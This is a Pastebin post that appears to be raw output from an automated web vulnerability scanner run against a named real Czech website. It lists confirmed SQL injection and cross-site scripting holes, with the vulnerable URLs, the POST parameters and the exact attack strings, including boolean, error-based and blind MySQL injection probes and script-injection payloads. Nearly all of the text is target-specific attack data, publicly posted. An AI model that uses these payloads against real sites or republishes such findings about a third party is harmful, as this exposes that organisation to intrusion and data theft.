Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: date_start
- Parameter Type: Post
- Attack Pattern: ' OR 'ns'='ns
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: date_stop
- Parameter Type: Post
- Attack Pattern: ' OR 'ns'='ns
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: date_start
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: date_start
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: date_stop
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: date_stop
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cat
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cat
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: date_start
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: date_stop
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: date_stop
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cat
- Parameter Type: Post
- Attack Pattern: '" ns=alert(0x000A9F)
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: date_start
- Parameter Type: Post
- Attack Pattern: '"><net sparker=alert(0x000AC5)>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: date_stop
- Parameter Type: Post
- Attack Pattern: '" ns=alert(0x000F62)
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/archiv/-/1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: date_start
- Parameter Type: Post
- Attack Pattern: '"><net sparker=alert(0x001299)>
- ||| MySQL Database Identified
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.cms-cma.cz/zobrazit/aktuality/-/1
- Parameter Name: date_start
- Parameter Type: Post
- Attack Pattern: -1'OR 1=1)) AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement